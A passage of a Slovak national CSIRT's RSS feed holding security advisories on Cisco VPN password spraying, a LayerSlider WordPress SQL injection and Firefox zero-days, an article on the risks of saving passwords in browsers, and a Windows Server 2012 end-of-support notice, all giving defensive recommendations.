<p>Počas tzv. password-spraying útoku sa útočník pokúša o prihlásenie na rôzne používateľské účty pomocou toho istého hesla. Útok na službu VPN sa môže vyznačovať niekoľkými charakteristickými znakmi. Pri pokuse o pripojenie s programom Cisco Secure Client (AnyConnect) sa používateľom zobrazí chyba &#8220;Unable to complete connection: Cisco Secure Desktop not installed on the client“ (chyba sa môže objaviť aj pri iných problémoch s pripojením VPN, a preto je dôležité skontrolovať aj ostatné znaky). Neschopnosť nadviazať spojenie VPN pomocou programu Cisco Secure Client (AnyConnect), keď je zapnutá funkcia Firewall Posture (HostScan) patrí medzi jeden z nich. Ďalším znakom môže byť neobvyklé zvýšenie množstva požiadaviek na overenie v systémových logoch.</p>



<p>Okrem toho, VPN koncentrátor Cisco Secure Firewall Adaptive Security Appliance (ASA) alebo Threat Defense (FTD) vykazuje v systémových logoch neobvyklé množstvo požiadaviek o overenie.  Znakmi takéhoto útoku môžu byť veľké počty detegovaných neúspešných pokusov o prístup. Pokiaľ väčšie množstvá pokusov smerujú z rovnakých IP adries a záznamy obsahujú aj úspešné prihlásenie z nich, môže ísť o vážny bezpečnostný incident.</p>



<p><strong><u>Pre zvýšenie úrovne ochrany a&nbsp;bezpečnosti spoločnosť Cisco odporúča:</u></strong></p>



<ul>
<li>Zapnúť protokolovanie na vzdialený syslog server pre zlepšenie analýzy a korelácie incidentov.</li>



<li>Zabezpečiť predvolené profily vzdialeného prístupu VPN nasmerovaním nepoužívaných predvolených profilov pripojenia na server AAA sinkhole, pre zabránenie neoprávneného prístupu.</li>



<li>Použiť TCP shun (shun list) na manuálne blokovanie škodlivých IP adries a nakonfigurujte control-plane ACL pre odfiltrovanie neoprávnených verejných IP adries z relácií VPN. (Prostredníctvom mailu môžete požiadať o množinu IoC.)</li>



<li>Použiť overovanie na základe certifikátov pre RAVPN, ktoré poskytuje bezpečnejšiu metódu overovania ako tradičné poverenia. </li>
</ul>



<p><strong>Poskytnutie IoC:</strong></p>



<p><strong>Zainteresované inštitúcie spadajúce pod konštituenciu VJ CSIRT môžu požiadať o množinu IoC pre účely odfiltrovania možných škodlivých IP adries mailom na info(at)csirt.sk</strong></p>



<p><strong>Možné naviazanie na APT29</strong></p>



<p>Bezpečnostní výskumníci Aaron Martin a Chris Grube v svojej analýze botnetu Brutus uvádzajú, že pokusy o prienik do VPN sú cielené okrem zariadení Cisco aj na zariadenia od výrobcov Fortinet, Palo Alto, SonicWall a dokonca na webové aplikácie používajúce Active Directory pre autentifikáciu.</p>



<p>Brutus strieda svoje IP každých šesť pokusov, aby sa vyhol detekcii a blokovaniu, pričom používa veľmi špecifické nezverejnené používateľské mená, ktoré nie sú dostupné vo verejných databázach.</p>



<p>Prevádzkovatelia botnetu doposiaľ neboli jednoznačne identifikovaní, ale výskumníkom sa podarilo identifikovať dve IP adresy, ktoré boli v minulosti spojené s aktivitami APT29 (Midnight Blizzard, NOBELIUM, Cozy Bear). Skupina APT 29 pravdepodobne pracuje pre ruskú zahraničnú spravodajskú službu (SVR).</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.cisco.com/c/en/us/support/docs/security/secure-firewall-threat-defense/221806-password-spray-attacks-impacting-custome.html">https://www.cisco.com/c/en/us/support/docs/security/secure-firewall-threat-defense/221806-password-spray-attacks-impacting-custome.html</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/cisco-warns-of-password-spraying-attacks-targeting-vpn-services/">https://www.bleepingcomputer.com/news/security/cisco-warns-of-password-spraying-attacks-targeting-vpn-services/</a></p>



<p><a href="https://annoyed.engineer/2024/03/23/the-brutus-botnet/">https://annoyed.engineer/2024/03/23/the-brutus-botnet/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/769/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v doplnku WordPress</title>
		<link>/posts/767</link>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 08 Apr 2024 07:04:08 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<guid isPermaLink="false">/?p=767</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>Doplnok obľúbenej platformy na tvorbu webových stránok obsahuje kritickú zraniteľnosť typu SQL injection, ktorá umožňuje neautentifikovaným útočníkom pripojiť ďalšie dotazy...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>
<p><strong>Doplnok obľúbenej platformy na tvorbu webových stránok obsahuje kritickú zraniteľnosť typu SQL injection, ktorá umožňuje neautentifikovaným útočníkom pripojiť ďalšie dotazy do existujúcich dotazov SQL. To môže viesť k neoprávnenému prístupu k citlivým informáciám z&nbsp;databázy, ako napríklad hash hesiel. Chyba sa nachádza v&nbsp;zásuvnom module WordPress s názvom LayerSlider.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>LayerSlider 7.9.11- 7.10.0</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-2879 (CVSS skóre 9,8)</strong></p>



<p><strong>Kritická zraniteľnosť</strong><strong> CVE-2024-2879 typu SQL injection sa nachádza v&nbsp;zásuvnom module LayerSlider pre platformu WordPress. Chyba sa týka nedostatočného escapovania parametrov</strong><strong> zadaných používateľom a&nbsp;absencie funkcie wpdb::prepare(), čo umožňuje neautentifikovanému útočníkovi pristupovať do existujúcich dotazov SQL</strong><strong>. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi neoprávnený prístup k citlivým informáciám</strong><strong> pomocou injektovania SQL príkazov.</strong></p>



<p><strong>Boli objavené ďalšie bezpečnostné chyby</strong><strong> v doplnkoch WordPress, ako napríklad Tutor LMS (CVE-2024-1751, skóre CVSS: 8,8) a Contact Form Entries (CVE-2024-2030, skóre CVSS: 6,4), ktoré mohli byť zneužité na zverejnenie informácií</strong><strong>, resp. injektovanie ľubovoľných webových skriptov.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong>Prístup k citlivým informáciám<strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia doplnku LayerSlider na verziu 7.10.1.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-2879">https://nvd.nist.gov/vuln/detail/CVE-2024-2879</a></p>



<p><a href="https://thehackernews.com/2024/04/critical-security-flaw-found-in-popular.html">https://thehackernews.com/2024/04/critical-security-flaw-found-in-popular.html</a></p>



<p><a href="https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/">https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for-unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress-plugin/</a></p>



<p><a href="https://layerslider.com/release-log/">https://layerslider.com/release-log/</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Zero day zraniteľnosti v prehliadači Firefox</title>
		<link>/posts/756</link>
					<comments>/posts/756#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 27 Mar 2024 13:50:31 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=756</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/Mozilla_Firefox_logo_2013.svg-min-1024x910.png" alt="" /></p>Spoločnosť Mozilla vydala bezpečnostné aktualizácie na opravu dvoch zero-day zraniteľností vo webovom prehliadači Firefox. Zraniteľnosti boli objavené počas hackerskej súťaže...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/Mozilla_Firefox_logo_2013.svg-min-1024x910.png" alt="" /></p>
<p><strong>Spoločnosť Mozilla vydala bezpečnostné aktualizácie na opravu dvoch zero-day zraniteľností vo webovom prehliadači Firefox. Zraniteľnosti boli objavené počas hackerskej súťaže Pwn20wn Vancouver 2024.</strong> <strong>Na obe zraniteľnosti poukázal výskumník</strong> <strong>Manfred Paul.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Firefox &lt; 124.0.1 a Firefox ESR &lt; 115.9.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-29944 (</strong><strong>Firefox a Firefox ESR</strong><strong>)</strong><strong></strong></p>



<p><strong>Zero-day zraniteľnosť CVE-2024-29944 umožňuje útočníkovi zvýšenie oprávnení a&nbsp;vykonanie ľubovoľného kódu JavaScript v&nbsp;nadradenom procese. Chyba neovplyvňuje mobilné verzie Firefoxu.</strong></p>



<p><strong>CVE-2024-29943 (Firefox)</strong></p>



<p><strong>Zraniteľnosť CVE-2024-29943 sa týka obchádzania kontroly v&nbsp;rozsahu pamäte objektov JavaScript a&nbsp;to útočníkovi umožňuje čítať alebo zapisovať mimo povolené hodnoty. Úspešné zneužitie umožňuje spustenie ľubovoľného kódu.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Spustenie ľubovoľného kódu</strong></li>



<li><strong></strong><strong>Zvýšenie oprávnení</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Firefox na verziu 124.0.1, Firefox ESR na verziu 115.9.1.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.mozilla.org/en-US/security/advisories/mfsa2024-15/#CVE-2024-29943">https://www.mozilla.org/en-US/security/advisories/mfsa2024-15/#CVE-2024-29943</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/mozilla-fixes-two-firefox-zero-day-bugs-exploited-at-pwn2own/">https://www.bleepingcomputer.com/news/security/mozilla-fixes-two-firefox-zero-day-bugs-exploited-at-pwn2own/</a></p>



<p><a href="https://www.mozilla.org/en-US/security/advisories/mfsa2024-16/">https://www.mozilla.org/en-US/security/advisories/mfsa2024-16/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/756/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Prečo je ukladanie hesiel do prehliadača nebezpečné? [Infografika]</title>
		<link>/posts/749</link>
					<comments>/posts/749#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 27 Mar 2024 13:47:17 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Infografika]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[safety]]></category>
		<guid isPermaLink="false">/?p=749</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>S rastúcim počtom webových služieb a online účtov sa zvyšuje aj počet hesiel, ktoré si musí človek pamätať. Ako reakciu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p><strong>S rastúcim počtom webových služieb a online účtov sa zvyšuje aj počet hesiel, ktoré si musí človek pamätať. Ako reakciu na túto potrebu si mnohí používatelia zvolili ukladanie hesiel do svojich internetových prehliadačov a používanie automatického vypĺňania. Je to pohodlné riešenie, ale webové prehliadače</strong> sú <strong>primárne navrhnuté na zobrazovanie webového obsahu</strong> a&nbsp;nie na zabezpečené ukladanie hesiel. V tomto článku sa dočítate prečo je nebezpečné ukladať svoje heslá v&nbsp;prehliadači a&nbsp;o odporúčaniach ako si ich ochrániť.</p>



<p>Heslá sú jedným z mála spôsobov, ako dokážeme zabezpečiť svoje účty. Odborníci z&nbsp;oblasti IT pravidelne vyzývajú používateľov, aby si tvorili bezpečné heslá – v súlade so špecifickými požiadavkami. Bližšie podrobnosti o&nbsp;bezpečnosti a&nbsp;vytváraní hesiel sme si pre <a href="https://csirt.sk/wp-content/uploads/2024/03/Infografika_Hesla_compressed.pdf" data-type="link" data-id="/wp-content/uploads/2024/03/Infografika_Hesla_compressed.pdf" target="_blank" rel="noreferrer noopener">Vás pripravili začiatkom septembra.</a></p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" src="/wp-content/uploads/2024/03/hesl-1.jpg" alt="" class="wp-image-751"/><figcaption class="wp-element-caption">                 Obrázok 1 Bezpečné heslá&nbsp;&nbsp;&nbsp; Zdroj: CSIRT</figcaption></figure></div>


<p>Nech sú vaše heslá akokoľvek bezpečné, v&nbsp;momente ich uloženia vo webovom prehliadači čelíte viacerým rizikám.</p>



<h2 class="wp-block-heading"><strong>Riziká ukladania hesiel v&nbsp;prehliadačoch</strong></h2>



<p>1. Prvé nebezpečenstvo predstavuje <strong>fyzický prístup</strong> k&nbsp;odomknutým zariadeniam obete, kedy útočník dokáže uložené heslá<strong> zneužiť na neoprávnený prístup</strong> do ,,zapamätaných“ systémov a&nbsp;následné <strong>vykonanie úkonov</strong> podľa úrovne oprávnenia účtu. Útočník dokonca môže heslá <strong>extrahovať na ďalšie použitie</strong>.</p>



<p>2. Správca hesiel vo webových prehliadačoch ukladá heslá do šifrovaných databáz, avšak pre <strong>konkrétne prehliadače </strong>sú verejne<strong> známe presné umiestnenia súborov </strong>na disku, ktoré<strong> obsahujú históriu prehliadania, databázu hesiel a&nbsp;dokonca aj hlavné heslo</strong> k&nbsp;šifrovaným databázam. <strong>Túto skutočnosť zneužívajú rôzne rodiny malvérov</strong>, ktoré zbierajú základné informácie o&nbsp;kompromitovanom zariadení, históriu prehliadačov a&nbsp;komunikačných platforiem, uložené heslá prehliadačov, obsah schránky operačného systému (eng. clipboard) alebo iných zvolených súborov a&nbsp;tieto údaje rôznymi metódami zasielajú útočníkovi. Medzi najznámejšie malvéry zamerané na získavanie citlivých dát možno zaradiť napr. Redline, Racoon, Lumma, SnakeKeylogger, Agent Tesla a&nbsp;ďalšie. Znalosť umiestnenia kľúčových súborov je <strong>taktiež využívaná aj v&nbsp;rámci riešenia kybernetických bezpečnostných incidentov</strong> a&nbsp;vyšetrovania trestných činov počítačovej kriminality.</p>



<p>3. Mimoriadne riziko predstavuje možnosť <strong>previazania prehliadača s&nbsp;kontom používateľa</strong> (napr. konto na službe MICROSOFT alebo GOOGLE), ktoré umožňuje <strong>pokročilé funkcie práce na viacerých zariadeniach</strong>, ako sú napr. zdieľanie histórie webového prehliadania, záložiek a&nbsp;synchronizácie uložených hesiel. <strong>Synchronizácia hesiel</strong> na jednej strane <strong>zvyšuje komfort používateľa</strong>, na druhej strane však predstavuje <strong>dodatočné riziko</strong>, kedy sa k&nbsp;heslám možno dostať <strong>kompromitáciou ľubovoľného zariadenia</strong> asociovaného s&nbsp;daným kontom.</p>



<p>Ako <strong>odstrašujúci príklad</strong> zneužitia tejto funkcionality možno použiť kybernetický bezpečnostný incident, ktorý spoločnosť CISCO riešila v&nbsp;roku 2022. Jeden z interných <strong>zamestnancov mal webový prehliadač na pracovnom zariadení previazaný so súkromným GOOGLE účtom a využíval synchronizáciu hesiel</strong>, vrátane prihlasovacích údajov do podnikovej VPN siete. Tento používateľ sa stal <strong>obeťou phishingového útoku</strong>, počas ktorého <strong>útočník získal prístup k&nbsp;jeho GOOGLE účtu</strong> a&nbsp;tým aj ku <strong>všetkým heslám</strong>. <strong>Prihlasovanie do VPN</strong> síce bolo <strong>chránené</strong> prostredníctvom <strong>viacfaktorovej autentifikácie</strong>, ale <strong>útočníkovi sa tento bezpečnostný prvok podarilo obísť prostredníctvom techník sociálneho inžinierstva</strong>, ktoré sú bližšie popísané&nbsp;na <a href="https://blog.talosintelligence.com/recent-cyber-attack/" target="_blank" rel="noreferrer noopener">tomto odkaze</a> v&nbsp;článku.</p>



<p><strong>4. Ukladanie údajov v&nbsp;prehliadači zvyšuje aj úspešnosť phishingových kampaní</strong>, kedy prehliadač pri rozpoznaní <strong>formulára</strong> na zadanie osobných alebo&nbsp;kartových údajov ponúkne používateľovi možnosť <strong>automatického vypĺňania</strong>. Táto funkcia je mimoriadne riziková dokonca aj v&nbsp;prípade, že si obeť uvedomí, že sa stala obeťou phishingu ešte pred odoslaním formulára, pretože <strong>pokročilé phishingové frameworky priebežne zasielajú zadávané údaje útočníkovi</strong>.</p>



<p>5. Okrem funkcií zabudovaných priamo v prehliadači je na ukladanie hesiel možné použiť aj <strong>externé doplnky, zásuvné moduly a&nbsp;pluginy</strong>, ktoré majú rôznu kvalitatívnu úroveň. Útočníci rôzne rozšírenia dokonca používajú ako <strong>mechanizmus šírenia škodlivého kódu</strong>, nakoľko používateľ medzi veľkým množstvom dostupných možností často nedokáže rozlíšiť legitímne aplikácie od tých škodlivých.</p>



<p>6. Vyššie uvedené <strong>rozšírenia</strong> rovnako ako samotné <strong>prehliadače</strong> môžu obsahovať <strong>bezpečnostné zraniteľnosti</strong>, ktoré možno zneužiť na naplnenie rôznych cieľov, od získania neoprávneného prístupu k&nbsp;citlivým údajom až po vzdialené vykonanie škodlivého kódu. Tie najzávažnejšie zraniteľnosti je možné zneužiť vzdialene a&nbsp;bez interakcie obete. Preto je dôležité všetky používané zariadenia a&nbsp;aplikácie <strong>pravidelne aktualizovať</strong>.</p>



<p><strong>Výhody používania aplikácií na správu hesiel</strong></p>



<p>Na ukladanie hesiel sa odporúča používať výhradne špecializované nástroje, tzv. <strong>aplikácie na správu hesiel</strong> (eng. password manager), ktoré boli navrhnuté s&nbsp;primárnym dôrazom na <strong>zabezpečenie dát, robustné šifrovanie a&nbsp;ochranu pred rôznymi scenármi odcudzenia</strong> prihlasovacích údajov. Tieto aplikácie umožňujú heslá prehľadne <strong>organizovať</strong> do kategórií a&nbsp;dokonca vykonávajú <strong>analýzy nad heslami</strong>, aby používateľov upozornili na recykláciu hesiel alebo skryté a&nbsp;predvídateľné vzory pri generovaní hesiel, vrátane jednoduchých úprav pri pravidelných zmenách hesiel. Niektoré služby dokonca heslá <strong>overujú voči online databázam uniknutých hesiel</strong>, čím umožňujú reagovať na prípadné úniky dát. Jednou z&nbsp;najznámejších služieb umožňujúcich preverenie, či došlo k&nbsp;úniku Vašich prihlasovacích údajov, je <strong><a href="https://haveibeenpwned.com/" target="_blank" rel="noreferrer noopener">HAVEIBEENPWNED</a></strong>, s&nbsp;ktorou <strong>CSIRT.SK v&nbsp;roku 2021 uzatvoril spoluprácu</strong>. Okrem hesiel umožňujú aj <strong>ukladanie súborov</strong> – napr. obrázkov a&nbsp;iného kryptografického materiálu (certifikáty, SSH kľúče a&nbsp;pod). Heslá skopírované do schránky operačného systému v nej udržujú len po obmedzený čas, čím znižujú riziko ich krádeže. V&nbsp;prípade využívania online služieb na manažment hesiel je treba brať do úvahy aj riziko, že bezpečnostné zraniteľnosti a&nbsp;incidenty u&nbsp;Vášho poskytovateľa môžu priamo ohroziť aj Vaše heslá.</p>



<h2 class="wp-block-heading"><strong>Odporúčania ako sa chrániť</strong></h2>



<p>1.<strong>Používajte silné heslá</strong>: Používajte silné heslá, ktoré obsahujú kombináciu veľkých a malých písmen, číslic a špeciálnych znakov. Odporúčame používať passphrase, frázy, ktoré si používateľ dokáže ľahšie zapamätať.<em> <strong>NEPOUŽÍVAJTE</strong> </em>však verše pesničiek, odseky z&nbsp;kníh, populárne citáty, osobné údaje alebo heslá, ktoré ste niekde videli (napr. slogany, reklamy&#8230;.). VJ CSIRT odporúča používať diakritiku pri vytváraní frázy, kde je to možné.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" src="/wp-content/uploads/2024/03/frazy-1.jpg" alt="" class="wp-image-753" style="width:472px;height:auto"/><figcaption class="wp-element-caption">Obrázok 2 Bezpečné heslá&nbsp;&nbsp;&nbsp; Zdroj: CyberHoot</figcaption></figure></div>


<p>2. <strong>Nepoužívajte funkciu automatického ukladania hesiel</strong> <strong>a&nbsp;dopĺňania</strong> vo webových prehliadačoch. Namiesto toho si zapamätajte svoje heslá alebo použite aplikácie na správcu hesiel, ako napríklad KeePass, LastPass, 1Password &nbsp;alebo Bitwarden.</p>



<p>3. <strong>Striktne oddeľujte</strong> súkromné a&nbsp;pracovné zariadenia.</p>



<p>4. Na všetkých službách, kde je to možné, <strong>majte aktivované viacfaktorové overovanie</strong> prístupu. Môžete si nastaviť overenie biometriou, odosielanie SMS správ, telefonický rozhovor alebo používať generátor tokenov pre vytvorenie jednorazového kódu či push notifikácie pre autentifikáciu do účtu (Duo Mobile, Authy, Google Authentificator). <strong>Svojich zamestnancov a&nbsp;známych vzdelajte aj o&nbsp;aktívne zneužívaných <a href="https://securityscorecard.com/blog/techniques-to-bypass-mfa/" target="_blank" rel="noreferrer noopener">metódach obchádzania viacfaktorovej autentifikácie</a></strong>.</p>



<p>5. <strong>Pravidelne</strong> <strong>aktualizujte </strong>operačný systém, používané aplikácie a&nbsp;ich rozšírenia, nakoľko môžu obsahovať ľahko zneužiteľné bezpečnostné zraniteľnosti.</p>



<p>6. <strong>Používané aplikácie,</strong> externé doplnky, zásuvné moduly a&nbsp;pluginy <strong>vždy inštalujte</strong> <strong>z&nbsp;overených a&nbsp;dôveryhodných zdrojov</strong>.</p>



<p>7. <strong><a href="https://www.sapphire.net/security-updates/how-to-secure-your-web-browser-aka-browser-hardening/" target="_blank" rel="noreferrer noopener">Hardening prehliadačov.</a></strong> Cieľom hardeningu prehliadačov je znížiť možný dopad zraniteľností a zvýšiť odolnosť prehliadača pred útokmi. Slúži nám na to najmä vhodná konfigurácia, ktorá zahŕňa blokovanie cookies, blokovanie&nbsp; načítavania obsahu z&nbsp;neznámych alebo nebezpečných zdrojov, aktiváciu dodatočných bezpečnostných funkcií ako blokovanie reklám, vypnutie telemetrie a&nbsp;<a href="https://www.cisa.gov/news-events/news/evaluating-your-web-browsers-security-settings" target="_blank" rel="noreferrer noopener">mnoho ďalších nastavení</a>. Odolnosť svojho prehliadača si môžete overiť prostredníctvom <a href="https://coveryourtracks.eff.org/" target="_blank" rel="noreferrer noopener">online testu</a>.</p>



<p>8. <strong><a href="https://www.cyberark.com/resources/blog/why-no-user-should-have-local-admin-rights" target="_blank" rel="noreferrer noopener">Používateľské konto</a>. </strong>Pri práci s prehliadačmi na operačnom systéme by ste mali vždy používať používateľské konto s&nbsp;nízkymi oprávneniami (user account) a nie administrátorské konto (administrator account).</p>



<p>V&nbsp;tomto článku sme si ukázali riziká spojené s&nbsp;ukladaním hesiel vo webových prehliadačoch, popísali výhody používania aplikácií na správu hesiel a&nbsp;odporúčania ako svoje heslá chrániť. Pri práci s&nbsp;heslami je potrebné dodržiavať základné zásady kybernetickej hygieny a&nbsp;držať sa vyššie uvedených odporúčaní VJ CSIRT.</p>



<p><em><u><strong>Sledujte nás na sociálnych sieťach:</strong></u></em></p>



<ul>
<li><a href="https://www.linkedin.com/company/csirt-sk" target="_blank" rel="noreferrer noopener">https://www.linkedin.com/company/csirt-sk</a></li>



<li><a href="https://www.facebook.com/VJCSIRT" target="_blank" rel="noreferrer noopener">https://www.facebook.com/VJCSIRT</a></li>



<li><a href="https://twitter.com/CSIRT_SK" target="_blank" rel="noreferrer noopener">https://twitter.com/CSIRT_SK</a></li>
</ul>



<p><strong>Zdroje:</strong></p>



<p><a href="https://blog.talosintelligence.com/recent-cyber-attack/">https://blog.talosintelligence.com/recent-cyber-attack/</a></p>



<p><a href="https://www.kaspersky.com/blog/how-to-store-passwords-securely/48784/">https://www.kaspersky.com/blog/how-to-store-passwords-securely/48784/</a></p>



<p><a href="https://www.tomsguide.com/news/dont-let-web-browsers-save-passwords">https://www.tomsguide.com/news/dont-let-web-browsers-save-passwords</a></p>



<p><a href="https://news.trendmicro.com/2023/11/27/is-it-safe-to-save-passwords-in-your-browser/">https://news.trendmicro.com/2023/11/27/is-it-safe-to-save-passwords-in-your-browser/</a></p>



<p><a href="https://www.ncsc.gov.uk/collection/top-tips-for-staying-secure-online/password-managers">https://www.ncsc.gov.uk/collection/top-tips-for-staying-secure-online/password-managers</a></p>



<p><a href="https://coveryourtracks.eff.org/">https://coveryourtracks.eff.org/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/749/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Koniec podpory pre Windows Server 2012 a Windows Server 2012 R2</title>
		<link>/posts/558</link>
					<comments>/posts/558#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 25 Mar 2024 12:38:23 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<guid isPermaLink="false">/?p=558</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/Windows_10_konci_podpora-1.png" alt="" /></p>Spoločnosť Microsoft plánovane zrušila podporu pre Windows Server 2012 a Windows Server 2012 R2. Po dátume 10. októbra 2023 už...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/Windows_10_konci_podpora-1.png" alt="" /></p>
<p><strong>Spoločnosť Microsoft plánovane zrušila podporu pre Windows Server 2012 a Windows Server 2012 R2. Po dátume 10. októbra 2023 už tieto produkty nebudú dostávať aktualizácie zabezpečenia, aktualizácie nesúvisiace so zabezpečením, opravy chýb, technickú podporu a ani aktualizácie technického obsahu online. Odporúčame prejsť na novšiu verziu operačného systému alebo používať rozšírenie ESU na dobu určitú.</strong></p>



<p>Zákazníkom &nbsp;Microsoft odporúča inovovať na systém Windows Server 2022. Ak nemôžete inovovať na novšiu verziu, budete musieť používať rozšírené aktualizácie zabezpečenia (ESU). ESU sú k dispozícii zadarmo v Azure alebo si ich treba zakúpiť pre lokálne nasadenia. Jednotky ESU budú každoročne obnovované do 13. októbra 2026. Zákazníci majú možnosť používať Azure Arcto, automaticky nasadzovať zakúpené jednotky ESU na mieste, ako aj rozšíriť zabezpečenie a správu Azure do svojho prostredia.</p>



<h2 class="wp-block-heading"><strong>Životnosť Windows Serverov</strong></h2>



<p>Hlavné vydania serverov Windows sa riadia politikou pevného životného cyklu spoločnosti Microsoft. To znamená, že sú podporované 10 rokov, vrátane 5 rokov bežnej podpory, po ktorej nasleduje 5 rokov rozšírenej podpory. Väčšina verzií Windows Server má tiež možnosť predĺžiť podporu o ďalšie 3 alebo 4 roky, ak si zakúpite možnosť Extended Security Update.</p>



<p>Plánované ukončenia podpory pre ďalšie verzie:</p>



<ul>
<li><strong>Verzia &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Koniec podpory</strong></li>



<li>Windows Server 2022&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Oct 14, 2031</li>



<li>Windows Server 2019&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Jan. 9, 2029</li>



<li>Windows Server 2016&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Jan. 12, 2027</li>



